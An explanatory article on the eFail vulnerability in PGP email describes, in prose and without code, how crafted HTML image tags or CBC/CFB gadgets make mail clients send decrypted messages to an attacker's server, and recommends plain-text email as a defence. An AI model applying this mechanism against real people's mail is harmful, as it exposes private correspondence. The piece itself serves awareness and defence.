PGP, which stands for Pretty Good Privacy, is a fairly popular method for encrypting emails. The OpenPGP standard has been in use since the early 1990s when not much was known or massively communicated about PGP encryption. And up until very recently, it was largely believed to be the safest way to transmit messages over the Internet without interference from a third party.
But researchers at Germany’s Münster University of Applied Sciences have discovered otherwise. Having unearthed a vulnerability in PGP encryption that has since been labeled “eFail,” the active content in email correspondence is exploited through the native behavior of HTML, the structure language for all web pages. On email pages, this content may be automatically downloaded without user knowledge, consent or both. Active content is comprised mostly of styling and images in your emails.
How the exploit of PGP Encryption works
For a PGP encryption attack to work, the attacker must be in possession of an encrypted message. This can be achieved through a number of ways, including eavesdropping and simple phishing attacks. Once access gained, there are two attack vectors that can be implemented. The first one is direct exfiltration which takes advantage of vulnerabilities that are present in Thunderbird (Mozilla), iOS Mail and Apple Mail.
The attacker begins by crafting an HTML email that contains three (3) functional parts: The beginning of an image request tag, the PGP cipher text, and the closing of an image request tag. This is sent to the victim whose email client will, perhaps unknowingly, decrypt the PGP cipher text, and then combine all three parts into a single URL which is prefixed with the attacker’s server address. This ultimately sends a request for an image that doesn’t exist, but the request on the attacker’s end contains the email which has been decrypted.
The second attack vector takes advantage of a flaw present in all email clients using PGP encryption or similar software following the OpenPGP specification. It is known as the CBC/CFB Gadget Attack. This scenario involves an attacker locating the first block of encrypted plain text in any given encrypted email. Once it is in their possession, another block full of zero (0) digits is added. This is followed by injecting HTML image tags into the plain text, resulting in the victim’s email client interpreting this as a single encrypted block. The plain text, in turn, is sent back to the attacker as an image.
How to avoid this vulnerability in PGP Encryption
If good news can be derived from the major vulnerability in PGP encryption, it would be the fact that there really isn’t a problem with its encryption protocol. The issue, instead, is how it is implemented. On top of this, potential attackers have no way of accessing your emails if they don’t gain access to any other encrypted correspondence. The best takeaway is that by disabling HTML rendering of your emails and using plain text instead, you should be safe from a PGP encryption attack regardless of what email client you choose to use.
The bad news? Boring, plain text emails, and the fact that HTML messages that were sent and received in the past are still subject to PGP encryption attacks. Even if users opt to delete these old, archived messages, there is still the inevitability of them existing elsewhere, in a different email client and in another user’s inbox.